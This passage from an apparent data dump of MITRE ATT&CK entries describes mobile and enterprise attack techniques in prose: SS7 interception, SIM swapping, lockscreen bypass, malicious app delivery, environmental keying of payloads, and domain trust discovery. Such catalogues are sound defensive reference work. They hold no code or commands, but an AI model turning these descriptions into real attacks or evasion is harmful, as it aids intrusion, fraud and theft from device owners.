           'description': 'An adversary could call standard operating system APIs from a malicious application to '
                          'gather contact list (i.e., address book) data, or with escalated privileges could directly '
                          'access files containing contact list data.',
           'name': 'Access Contact List',
           'platforms': ['Android', 'iOS']},
 'T1433': {'attack_id': 'T1433',
           'categories': ['collection'],
           'description': 'On Android, an adversary could call standard operating system APIs from a malicious '
                          'application to gather call log data, or with escalated privileges could directly access '
                          'files containing call log data.\n'
                          '\n'
                          'On iOS, applications do not have access to the call log, so privilege escalation would be '
                          'required in order to access the data.',
           'name': 'Access Call Log',
           'platforms': ['Android', 'iOS']},
 'T1435': {'attack_id': 'T1435',
           'categories': ['collection'],
           'description': 'An adversary could call standard operating system APIs from a malicious application to '
                          'gather calendar entry data, or with escalated privileges could directly access files '
                          'containing calendar data.',
           'name': 'Access Calendar Entries',
           'platforms': ['Android', 'iOS']},
 'T1436': {'attack_id': 'T1436',
           'categories': ['command-and-control', 'exfiltration'],
           'description': 'Adversaries may communicate over a commonly used port to bypass firewalls or network '
                          'detection systems and to blend with normal network activity to avoid more detailed '
                          'inspection. \n'
                          '\n'
                          'They may use commonly open ports such as\n'
                          '\n'
                          '* TCP:80 (HTTP)\n'
                          '* TCP:443 (HTTPS)\n'
                          '* TCP:25 (SMTP)\n'
                          '* TCP/UDP:53 (DNS)\n'
                          '\n'
                          'They may use the protocol associated with the port or a completely different protocol.',
           'name': 'Commonly Used Port',
           'platforms': ['Android', 'iOS']},
 'T1437': {'attack_id': 'T1437',
           'categories': ['command-and-control', 'exfiltration'],
           'description': 'Adversaries may communicate using a common, standardized application layer protocol such as '
                          'HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.\n'
                          '\n'
                          'In the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push '
                          'Notification Service (APNS; one-way server-to-device) are commonly used protocols on '
                          'Android and iOS respectively that would blend in with routine device traffic and are '
                          'difficult for enterprises to inspect. Google reportedly responds to reports of abuse by '
                          'blocking access to GCM.(Citation: Kaspersky-MobileMalware)',
           'name': 'Standard Application Layer Protocol',
           'platforms': ['Android', 'iOS']},
 'T1438': {'attack_id': 'T1438',
           'categories': ['command-and-control', 'exfiltration'],
           'description': 'Adversaries can communicate using cellular networks rather than enterprise Wi-Fi in order '
                          'to bypass enterprise network monitoring systems. Adversaries may also communicate using '
                          'other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network '
                          'monitoring systems.',
           'name': 'Alternate Network Mediums',
           'platforms': ['Android', 'iOS']},
 'T1439': {'attack_id': 'T1439',
           'categories': ['network-effects'],
           'description': 'If network traffic between the mobile device and remote servers is unencrypted or is '
                          'encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop '
                          'on communication.(Citation: mHealth)',
           'name': 'Eavesdrop on Insecure Network Communication',
           'platforms': ['Android', 'iOS']},
 'T1444': {'attack_id': 'T1444',
           'categories': ['initial-access', 'defense-evasion'],
           'description': 'An adversary could distribute developed malware by masquerading the malware as a legitimate '
                          'application. This can be done in two different ways: by embedding the malware in a '
                          'legitimate application, or by pretending to be a legitimate application.\n'
                          '\n'
                          'Embedding the malware in a legitimate application is done by downloading the application, '
                          'disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The '
                          'app would appear to be the original app, but would contain additional malicious '
                          'functionality. The adversary could then publish the malicious application to app stores or '
                          'use another delivery method.\n'
                          '\n'
                          'Pretending to be a legitimate application relies heavily on lack of scrutinization by the '
                          'user. Typically, a malicious app pretending to be a legitimate one will have many similar '
                          'details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto '
                          'HenBox)\n'
                          '\n'
                          'Malicious applications may also masquerade as legitimate applications when requesting '
                          'access to the accessibility service in order to appear as legitimate to the user, '
                          'increasing the likelihood that the access will be granted.',
           'name': 'Masquerade as Legitimate Application',
           'platforms': ['Android', 'iOS']},
 'T1446': {'attack_id': 'T1446',
           'categories': ['impact', 'defense-evasion'],
           'description': 'An adversary may seek to lock the legitimate user out of the device, for example to inhibit '
                          'user interaction or to obtain a ransom payment.\n'
                          '\n'
                          'On Android versions prior to 7, apps can abuse Device Administrator access to reset the '
                          'device lock passcode to prevent the user from unlocking the device. After Android 7, only '
                          'device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android '
                          'resetPassword)\n'
                          '\n'
                          'On iOS devices, this technique does not work because mobile device management servers can '
                          'only remove the screen lock passcode, they cannot set a new passcode. However, on '
                          'jailbroken devices, malware has been discovered that can lock the user out of the '
                          'device.(Citation: Xiao-KeyRaider)',
           'name': 'Device Lockout',
           'platforms': ['Android', 'iOS']},
 'T1447': {'attack_id': 'T1447',
           'categories': ['impact', 'defense-evasion'],
           'description': 'Adversaries may wipe a device or delete individual files in order to manipulate external '
                          'outcomes or hide activity. An application must have administrator access to fully wipe the '
                          'device, while individual files may not require special permissions to delete depending on '
                          'their storage location. (Citation: Android DevicePolicyManager 2019)\n'
                          '\n'
                          'Stored data could include a variety of file formats, such as Office files, databases, '
                          'stored emails, and custom file formats. The impact file deletion will have depends on the '
                          'type of data as well as the goals and objectives of the adversary, but can include deleting '
                          'update files to evade detection or deleting attacker-specified files for impact.',
           'name': 'Delete Device Data',
           'platforms': ['Android']},
 'T1448': {'attack_id': 'T1448',
           'categories': ['impact'],
           'description': 'A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in '
                          'several different ways, including SMS toll fraud and SMS shortcodes that make purchases.\n'
                          '\n'
                          'Performing SMS fraud relies heavily upon the fact that, when making SMS purchases, the '
                          'carriers perform device verification but not user verification. This allows adversaries to '
                          'make purchases on behalf of the user, with little or no user interaction.(Citation: Google '
                          'Bread)\n'
                          '\n'
                          'Malicious applications may also perform toll billing, which occurs when carriers provide '
                          'payment endpoints over a web page. The application connects to the web page over cellular '
                          'data so the carrier can directly verify the number, or the application must retrieve a code '
                          'sent via SMS and enter it into the web page.(Citation: Google Bread)\n'
                          '\n'
                          'On iOS, apps cannot send SMS messages.\n'
                          '\n'
                          'On Android, apps must hold the `SEND_SMS` permission to send SMS messages. Additionally, '
                          'Android version 4.2 and above has mitigations against this threat by requiring user consent '
                          'before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).',
           'name': 'Carrier Billing Fraud',
           'platforms': ['Android']},
 'T1449': {'attack_id': 'T1449',
           'categories': ['network-effects'],
           'description': 'An adversary could exploit signaling system vulnerabilities to redirect calls or text '
                          "messages (SMS) to a phone number under the attacker's control. The adversary could then act "
                          'as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) '
                          '(Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: '
                          'CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain '
                          'authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).',
           'name': 'Exploit SS7 to Redirect Phone Calls/SMS',
           'platforms': ['Android', 'iOS']},
 'T1450': {'attack_id': 'T1450',
           'categories': ['network-effects'],
           'description': 'An adversary could exploit signaling system vulnerabilities to track the location of mobile '
                          'devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) '
                          '(Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)',
           'name': 'Exploit SS7 to Track Device Location',
           'platforms': ['Android', 'iOS']},
 'T1451': {'attack_id': 'T1451',
           'categories': ['network-effects'],
           'description': 'An adversary could convince the mobile network operator (e.g. through social networking, '
                          'forged identification, or insider attacks performed by trusted employees) to issue a new '
                          'SIM card and associate it with an existing phone number and account (Citation: '
                          'NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS '
                          'messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). \n'
                          '\n'
                          'One use case is intercepting authentication messages or phone calls to obtain illicit '
                          'access to online banking or other online accounts, as many online services allow account '
                          'password resets by sending an authentication code over SMS to a phone number associated '
                          'with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citation: '
                          'Krebs-SimSwap)(Citation: TechCrunch-SimSwap).',
           'name': 'SIM Card Swap',
           'platforms': ['Android', 'iOS']},
 'T1452': {'attack_id': 'T1452',
           'categories': ['impact'],
           'description': "An adversary could use access to a compromised device's credentials to attempt to "
                          'manipulate app store rankings or ratings by triggering application downloads or posting '
                          'fake reviews of applications. This technique likely requires privileged access (a rooted or '
                          'jailbroken device).',
           'name': 'Manipulate App Store Rankings or Ratings',
           'platforms': ['Android', 'iOS']},
 'T1453': {'attack_id': 'T1453',
           'categories': ['collection', 'credential-access', 'impact', 'defense-evasion'],
           'description': '**This technique has been deprecated. Please use [Input '
                          'Capture](https://attack.mitre.org/techniques/T1417), [Input '
                          'Injection](https://attack.mitre.org/techniques/T1516), and [Input '
                          'Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**\n'
                          '\n'
                          "A malicious app could abuse Android's accessibility features to capture sensitive data or "
                          'perform other malicious actions.(Citation: Skycure-Accessibility)\n'
                          '\n'
                          "Adversaries may abuse accessibility features on Android to emulate a user's clicks, for "
                          "example to steal money from a user's bank account.(Citation: "
                          'android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)\n'
                          '\n'
                          'Adversaries may abuse accessibility features on Android devices to evade defenses by '
                          'repeatedly clicking the "Back" button when a targeted app manager or mobile security app is '
                          'launched, or when strings suggesting uninstallation are detected in the foreground. This '
                          'effectively prevents the malicious application from being uninstalled.(Citation: '
                          'android-trojan-steals-paypal-2fa)',
           'name': 'Abuse Accessibility Features',
           'platforms': ['Android']},
 'T1456': {'attack_id': 'T1456',
           'categories': ['initial-access'],
           'description': 'As described by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), a '
                          'drive-by compromise is when an adversary gains access to a system through a user visiting a '
                          "website over the normal course of browsing. With this technique, the user's web browser is "
                          'targeted for exploitation. For example, a website may contain malicious media content '
                          'intended to exploit vulnerabilities in media parsers as demonstrated by the Android '
                          'Stagefright vulnerability  (Citation: Zimperium-Stagefright).\n'
                          '\n'
                          '(This technique was formerly known as Malicious Web Content. It has been renamed to better '
                          'align with ATT&CK for Enterprise.)',
           'name': 'Drive-by Compromise',
           'platforms': ['Android', 'iOS']},
 'T1458': {'attack_id': 'T1458',
           'categories': ['initial-access'],
           'description': 'If the mobile device is connected (typically via USB) to a charging station or a PC, for '
                          "example to charge the device's battery, then a compromised or malicious charging station or "
                          'PC could attempt to exploit the mobile device via the connection(Citation: '
                          'Krebs-JuiceJacking).\n'
                          '\n'
                          'Previous demonstrations have included:\n'
                          '\n'
                          '* Injecting malicious applications into iOS devices(Citation: Lau-Mactans).\n'
                          '* Exploiting a Nexus 6 or 6P device over USB and gaining the ability to perform actions '
                          'including intercepting phone calls, intercepting network traffic, and obtaining the device '
                          'physical location(Citation: IBM-NexusUSB).\n'
                          '* Exploiting Android devices such as the Google Pixel 2 over USB(Citation: '
                          'GoogleProjectZero-OATmeal).\n'
                          '\n'
                          'Products from Cellebrite and Grayshift purportedly can use physical access to the data port '
                          'to unlock the passcode on some iOS devices(Citation: Computerworld-iPhoneCracking).',
           'name': 'Exploit via Charging Station or PC',
           'platforms': ['Android', 'iOS']},
 'T1461': {'attack_id': 'T1461',
           'categories': ['initial-access'],
           'description': "An adversary with physical access to a mobile device may seek to bypass the device's "
                          'lockscreen.\n'
                          '\n'
                          '### Biometric Spoofing\n'
                          "If biometric authentication is used, an adversary could attempt to spoof a mobile device's "
                          'biometric authentication mechanism(Citation: SRLabs-Fingerprint)(Citation: '
                          'SecureIDNews-Spoof)(Citation: TheSun-FaceID).\n'
                          '\n'
                          'iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint '
                          'to unlock the device after every device restart and after 48 hours since the device was '
                          'last unlocked (Citation: Apple-TouchID). Android has similar mitigations.\n'
                          '\n'
                          '### Device Unlock Code Guessing or Brute Force\n'
                          'An adversary could attempt to brute-force or otherwise guess the lockscreen passcode '
                          '(typically a PIN or password), including physically observing ("shoulder surfing") the '
                          "device owner's use of the lockscreen passcode. \n"
                          '\n'
                          '### Exploit Other Device Lockscreen Vulnerabilities\n'
                          'Techniques have periodically been demonstrated that exploit vulnerabilities on Android '
                          '(Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile '
                          'devices to bypass the device lockscreen. The vulnerabilities are generally patched by the '
                          'device/operating system vendor once they become aware of their existence.',
           'name': 'Lockscreen Bypass',
           'platforms': ['Android', 'iOS']},
 'T1463': {'attack_id': 'T1463',
           'categories': ['network-effects'],
           'description': 'If network traffic between the mobile device and a remote server is not securely protected, '
                          'then an attacker positioned on the network may be able to manipulate network communication '
                          'without being detected. For example, FireEye researchers found in 2014 that 68% of the top '
                          '1,000 free applications in the Google Play Store had at least one Transport Layer Security '
                          "(TLS) implementation vulnerability potentially opening the applications' network traffic to "
                          'man-in-the-middle attacks (Citation: FireEye-SSL).',
           'name': 'Manipulate Device Communication',
           'platforms': ['Android', 'iOS']},
 'T1464': {'attack_id': 'T1464',
           'categories': ['network-effects'],
           'description': 'An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile '
                          'device from communicating. (Citation: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: '
                          'NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)',
           'name': 'Jamming or Denial of Service',
           'platforms': ['Android', 'iOS']},
 'T1465': {'attack_id': 'T1465',
           'categories': ['network-effects'],
           'description': 'An adversary could set up unauthorized Wi-Fi access points or compromise existing access '
                          'points and, if the device connects to them, carry out network-based attacks such as '
                          'eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: '
                          'Kaspersky-DarkHotel).',
           'name': 'Rogue Wi-Fi Access Points',
           'platforms': ['Android', 'iOS']},
 'T1466': {'attack_id': 'T1466',
           'categories': ['network-effects'],
           'description': 'An adversary could cause the mobile device to use less secure protocols, for example by '
                          'jamming frequencies used by newer protocols such as LTE and only allowing older protocols '
                          'such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make '
                          'communication easier to eavesdrop upon or manipulate.',
           'name': 'Downgrade to Insecure Protocols',
           'platforms': ['Android', 'iOS']},
 'T1467': {'attack_id': 'T1467',
           'categories': ['network-effects'],
           'description': 'An adversary could set up a rogue cellular base station and then use it to eavesdrop on or '
                          'manipulate cellular device communication. A compromised cellular femtocell could be used to '
                          'carry out this technique(Citation: Computerworld-Femtocell).',
           'name': 'Rogue Cellular Base Station',
           'platforms': ['Android', 'iOS']},
 'T1468': {'attack_id': 'T1468',
           'categories': ['remote-service-effects'],
           'description': 'An adversary who is able to obtain unauthorized access to or misuse authorized access to '
                          "cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or "
                          'to an enterprise mobility management (EMM) / mobile device management (MDM) server console '
                          'could use that access to track mobile devices.(Citation: Krebs-Location)',
           'name': 'Remotely Track Device Without Authorization',
           'platforms': ['Android', 'iOS']},
 'T1469': {'attack_id': 'T1469',
           'categories': ['remote-service-effects'],
           'description': 'An adversary who is able to obtain unauthorized access to or misuse authorized access to '
                          "cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or "
                          'to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).',
           'name': 'Remotely Wipe Data Without Authorization',
           'platforms': ['Android', 'iOS']},
 'T1470': {'attack_id': 'T1470',
           'categories': ['remote-service-effects'],
           'description': 'An adversary who is able to obtain unauthorized access to or misuse authorized access to '
                          "cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use "
                          'that access to obtain sensitive data stored in device backups. For example, the Elcomsoft '
                          "Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's "
                          'iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) '
                          'obtaining WhatsApp communication histories from backups stored in iCloud.',
           'name': 'Obtain Device Cloud Backups',
           'platforms': ['Android', 'iOS']},
 'T1471': {'attack_id': 'T1471',
           'categories': ['impact'],
           'description': 'An adversary may encrypt files stored on the mobile device to prevent the user from '
                          'accessing them, for example with the intent of only unlocking access to the files after a '
                          'ransom is paid. Without escalated privileges, the adversary is generally limited to only '
                          'encrypting files in external/shared storage locations. This technique has been demonstrated '
                          'on Android. We are unaware of any demonstrated use on iOS.',
           'name': 'Data Encrypted for Impact',
           'platforms': ['Android']},
 'T1472': {'attack_id': 'T1472',
           'categories': ['impact'],
           'description': 'An adversary could seek to generate fraudulent advertising revenue from mobile devices, for '
                          'example by triggering automatic clicks of advertising links without user involvement.',
           'name': 'Generate Fraudulent Advertising Revenue',
           'platforms': ['Android', 'iOS']},
 'T1474': {'attack_id': 'T1474',
           'categories': ['initial-access'],
           'description': 'As further described in [Supply Chain '
                          'Compromise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the '
                          'manipulation of products or product delivery mechanisms prior to receipt by a final '
                          'consumer for the purpose of data or system compromise. Somewhat related, adversaries could '
                          'also identify and exploit inadvertently present vulnerabilities. In many cases, it may be '
                          'difficult to be certain whether exploitable functionality is due to malicious intent or '
                          'simply inadvertent mistake.\n'
                          '\n'
                          'Third-party libraries incorporated into mobile apps could contain malicious behavior, '
                          'privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately '
                          'insert malicious behavior or could exploit inadvertent vulnerabilities. For example, '
                          'security issues have previously been identified in third-party advertising libraries '
                          'incorporated into apps.(Citation: NowSecure-RemoteCode)(Citation: Grace-Advertisement).',
           'name': 'Supply Chain Compromise',
           'platforms': ['Android', 'iOS']},
 'T1475': {'attack_id': 'T1475',
           'categories': ['initial-access'],
           'description': 'Malicious applications are a common attack vector used by adversaries to gain a presence on '
                          'mobile devices. Mobile devices often are configured to allow application installation only '
                          'from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may '
                          'seek to place a malicious application in an authorized app store, enabling the application '
                          'to be installed onto targeted devices.\n'
                          '\n'
                          'App stores typically require developer registration and use vetting techniques to identify '
                          'malicious applications. Adversaries may use these techniques against app store defenses:\n'
                          '\n'
                          '* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n'
                          '* [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)\n'
                          '\n'
                          'Adversaries may also seek to evade vetting by placing code in a malicious application to '
                          'detect whether it is running in an app analysis environment and, if so, avoid performing '
                          'malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) '
                          '(Citation: Percoco-Bouncer) (Citation: Wang)\n'
                          '\n'
                          'Adversaries may also use fake identities, payment cards, etc., to create developer accounts '
                          'to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n'
                          '\n'
                          "Adversaries may also use control of a target's Google account to use the Google Play "
                          "Store's remote installation capability to install apps onto the Android devices associated "
                          'with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only '
                          'applications that are available for download through the Google Play Store can be remotely '
                          'installed using this technique.)',
           'name': 'Deliver Malicious App via Authorized App Store',
           'platforms': ['Android', 'iOS']},
 'T1476': {'attack_id': 'T1476',
           'categories': ['initial-access'],
           'description': 'Malicious applications are a common attack vector used by adversaries to gain a presence on '
                          'mobile devices. This technique describes installing a malicious application on targeted '
                          'mobile devices without involving an authorized app store (e.g., Google Play Store or Apple '
                          'App Store). Adversaries may wish to avoid placing malicious applications in an authorized '
                          'app store due to increased potential risk of detection or other reasons. However, mobile '
                          'devices often are configured to allow application installation only from an authorized app '
                          'store which would prevent this technique from working.\n'
                          '\n'
                          'Delivery methods for the malicious application include:\n'
                          '\n'
                          '* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) - Including the '
                          'mobile app package as an attachment to an email message.\n'
                          '* [Spearphishing Link](https://attack.mitre.org/techniques/T1192) - Including a link to the '
                          'mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, '
                          'etc.), web site, QR code, or other means.\n'
                          '* Third-Party App Store - Installed from a third-party app store (as opposed to an '
                          'authorized app store that the device implicitly trusts as part of its default behavior), '
                          'which may not apply the same level of scrutiny to apps as applied by an authorized app '
                          'store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: '
                          'TrendMicro-FlappyBird)\n'
                          '\n'
                          'Some Android malware comes with functionality to install additional applications, either '
                          'automatically or when the adversary instructs it to.(Citation: '
                          'android-trojan-steals-paypal-2fa)',
           'name': 'Deliver Malicious App via Other Means',
           'platforms': ['Android', 'iOS']},
 'T1477': {'attack_id': 'T1477',
           'categories': ['initial-access'],
           'description': 'The mobile device may be targeted for exploitation through its interface to cellular '
                          'networks or other radio interfaces.\n'
                          '\n'
                          '### Baseband Vulnerability Exploitation\n'
                          '\n'
                          'A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, '
                          'NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit '
                          'a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: '
                          'Weinmann-Baseband).\n'
                          '\n'
                          '### Malicious SMS Message\n'
                          '\n'
                          'An SMS message could contain content designed to exploit vulnerabilities in the SMS parser '
                          'on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a '
                          'link to a web site containing malicious content designed to exploit the device web browser. '
                          'Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: '
                          'SRLabs-SIMCard).',
           'name': 'Exploit via Radio Interfaces',
           'platforms': ['Android', 'iOS']},
 'T1478': {'attack_id': 'T1478',
           'categories': ['defense-evasion', 'initial-access'],
           'description': 'An adversary could attempt to install insecure or malicious configuration settings on the '
                          'mobile device, through means such as phishing emails or text messages either directly '
                          'containing the configuration settings as an attachment, or containing a web link to the '
                          'configuration settings. The device user may be tricked into installing the configuration '
                          'settings through social engineering techniques (Citation: Symantec-iOSProfile).\n'
                          '\n'
                          'For example, an unwanted Certification Authority (CA) certificate could be placed in the '
                          "device's trusted certificate store, increasing the device's susceptibility to "
                          "man-in-the-middle network attacks seeking to eavesdrop on or manipulate the device's "
                          'network communication ([Eavesdrop on Insecure Network '
                          'Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device '
                          'Communication](https://attack.mitre.org/techniques/T1463)).\n'
                          '\n'
                          'On iOS, malicious Configuration Profiles could contain unwanted Certification Authority '
                          '(CA) certificates or other insecure settings such as unwanted proxy server or VPN settings '
                          "to route the device's network traffic through an adversary's system. The device could also "
                          'potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: '
                          'Talos-MDM).',
           'name': 'Install Insecure or Malicious Configuration',
           'platforms': ['Android', 'iOS']},
 'T1480': {'attack_id': 'T1480',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use execution guardrails to constrain execution or actions based on '
                          'adversary supplied and environment specific conditions that are expected to be present on '
                          'the target. Guardrails ensure that a payload only executes against an intended target and '
                          'reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia '
                          'Guardrails) Values an adversary can provide about a target system or environment to use as '
                          'guardrails may include specific network share names, attached physical devices, files, '
                          'joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye '
                          'Outlook Dec 2019)\n'
                          '\n'
                          'Guardrails can be used to prevent exposure of capabilities in environments that are not '
                          'intended to be compromised or operated within. This use of guardrails is distinct from '
                          'typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While '
                          'use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may '
                          'involve checking for known sandbox values and continuing with execution only if there is no '
                          'match, the use of guardrails will involve checking for an expected target-specific value '
                          'and only continuing with execution if there is such a match.',
           'name': 'Execution Guardrails',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1480.001': {'attack_id': 'T1480.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may environmentally key payloads or other features of malware to evade '
                              'defenses and constraint execution to a specific target environment. Environmental '
                              'keying uses cryptography to constrain execution or actions based on adversary supplied '
                              'environment specific conditions that are expected to be present on the target. '
                              'Environmental keying is an implementation of [Execution '
                              'Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic '
                              'techniques for deriving encryption/decryption keys from specific types of values in a '
                              'given computing environment.(Citation: EK Clueless Agents)\n'
                              '\n'
                              'Values can be derived from target-specific elements and used to generate a decryption '
                              'key for an encrypted payload. Target-specific values can be derived from specific '
                              'network shares, physical devices, software/software versions, files, joined AD domains, '
                              'system time, and local/external IP addresses.(Citation: Kaspersky Gauss '
                              'Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware '
                              'Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By '
                              'generating the decryption keys from target-specific environmental values, environmental '
                              'keying can make sandbox detection, anti-virus detection, crowdsourcing of information, '
                              'and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: '
                              'Ebowla: Genetic Malware) These difficulties can slow down the incident response process '
                              'and help adversaries hide their tactics, techniques, and procedures (TTPs).\n'
                              '\n'
                              'Similar to [Obfuscated Files or '
                              'Information](https://attack.mitre.org/techniques/T1027), adversaries may use '
                              'environmental keying to help protect their TTPs and evade detection. Environmental '
                              'keying may be used to deliver an encrypted payload to the target that will use '
                              'target-specific values to decrypt the payload before execution.(Citation: Kaspersky '
                              'Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed '
                              'HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By '
                              'utilizing target-specific values to decrypt the payload the adversary can avoid '
                              'packaging the decryption key with the payload or sending it over a potentially '
                              'monitored network connection. Depending on the technique for gathering target-specific '
                              'values, reverse engineering of the encrypted payload can be exceptionally '
                              'difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure '
                              'of capabilities in environments that are not intended to be compromised or operated '
                              'within.\n'
                              '\n'
                              'Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), '
                              'environmental keying can be used to prevent exposure of capabilities in environments '
                              'that are not intended to be compromised or operated within. This activity is distinct '
                              'from typical [Virtualization/Sandbox '
                              'Evasion](https://attack.mitre.org/techniques/T1497). While use of '
                              '[Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve '
                              'checking for known sandbox values and continuing with execution only if there is no '
                              'match, the use of environmental keying will involve checking for an expected '
                              'target-specific value that must match for decryption and subsequent execution to be '
                              'successful.',
               'name': 'Environmental Keying',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1481': {'attack_id': 'T1481',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use an existing, legitimate external Web service as a means for relaying '
                          'commands to a compromised system.\n'
                          '\n'
                          'These commands may also include pointers to command and control (C2) infrastructure. '
                          'Adversaries may post content, known as a dead drop resolver, on Web services with embedded '
                          '(and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach '
                          'out to and be redirected by these resolvers.\n'
                          '\n'
                          'Popular websites and social media acting as a mechanism for C2 may give a significant '
                          'amount of cover due to the likelihood that hosts within a network are already communicating '
                          'with them prior to a compromise. Using common services, such as those offered by Google or '
                          'Twitter, makes it easier for adversaries to hide in expected noise. Web service providers '
                          'commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n'
                          '\n'
                          'Use of Web services may also protect back-end C2 infrastructure from discovery through '
                          'malware binary analysis while also enabling operational resiliency (since this '
                          'infrastructure may be dynamically changed).',
           'name': 'Web Service',
           'platforms': ['Android', 'iOS']},
 'T1482': {'attack_id': 'T1482',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to gather information on domain trust relationships that may be '
                          'used to identify lateral movement opportunities in Windows multi-domain/forest '
                          'environments. Domain trusts provide a mechanism for a domain to allow access to resources '
                          'based on the authentication procedures of another domain.(Citation: Microsoft Trusts) '
                          'Domain trusts allow the users of the trusted domain to access resources in the trusting '
                          'domain. The information discovered may help the adversary conduct [SID-History '
                          'Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the '
                          'Ticket](https://attack.mitre.org/techniques/T1550/003), and '
                          '[Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity '
                          'Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated '
                          'using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: '
                          'Harmj0y Domain Trusts) The Windows utility '
                          '[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to '
                          'enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)',
           'name': 'Domain Trust Discovery',
           'platforms': ['Windows']},
 'T1484': {'attack_id': 'T1484',
           'categories': ['defense-evasion', 'privilege-escalation'],
           'description': 'Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary '
                          'access controls for a domain, usually with the intention of escalating privileges on the '
                          'domain. Group policy allows for centralized management of user and computer settings in '
                          'Active Directory (AD). GPOs are containers for group policy settings made up of files '
                          'stored within a predicable network path '
                          '<code>\\\\&lt;DOMAIN&gt;\\SYSVOL\\&lt;DOMAIN&gt;\\Policies\\</code>.(Citation: TechNet '
                          'Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n'
                          '\n'
                          'Like other objects in AD, GPOs have access controls associated with them. By default all '
                          'user accounts in the domain have permission to read GPOs. It is possible to delegate GPO '
                          'access control permissions, e.g. write access, to specific users or groups in the domain.\n'
                          '\n'
                          'Malicious GPO modifications can be used to implement many other malicious behaviors such as '
                          '[Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify '
                          'Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool '
                          'Transfer](https://attack.mitre.org/techniques/T1105), [Create '
                          'Account](https://attack.mitre.org/techniques/T1136), [Service '
                          'Execution](https://attack.mitre.org/techniques/T1035),  and more.(Citation: ADSecurity GPO '
